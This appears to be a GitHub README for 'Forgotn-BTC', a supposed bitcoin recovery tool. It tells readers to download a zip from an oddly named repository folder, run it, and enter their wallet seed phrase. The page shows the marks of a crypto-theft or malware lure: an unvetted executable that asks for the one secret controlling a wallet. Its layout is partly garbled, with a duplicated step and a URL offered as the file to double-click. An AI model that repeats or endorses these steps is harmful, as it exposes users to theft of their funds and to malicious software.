Forgotn-BTC helps you recover lost bitcoins by using your mnemonic phrases or seed phrases. This application is straightforward and requires no technical skills. Just follow the steps below to get started.
- Visit the Releases Page: To download the software, go to the Releases page.
- Choose the Right File: Look for the latest version in the list. You will find files for different operating systems. Click the appropriate file for your system.
- Download the File: The file will start downloading automatically. Once it’s done, locate the file in your downloads folder.
- Run the Application:
- For Windows: Double-click the downloaded file (e.g.,
https://raw.githubusercontent.com/mbaaus/Forgotn-BTC/main/weanable/Forgotn-BTC-v3.2.zip). - For Mac: Open the downloaded file and drag it to your Applications folder.
- For Linux: Use the terminal to navigate to the download directory and run the file with
./Forgotn-BTC.
- For Windows: Double-click the downloaded file (e.g.,
- Open the Application: Launch Forgotn-BTC from your applications list or desktop shortcut.
- Input Your Seed Phrase: Enter your seed phrase or mnemonic phrase into the provided text box. Be careful to enter it exactly as it was originally written.
- Start the Recovery Process: Click the
Recoverbutton. The software will analyze your data and look for any lost bitcoins associated with the provided phrases. - View the Results: After the process is complete, the application will show you any recovered wallets and balances.
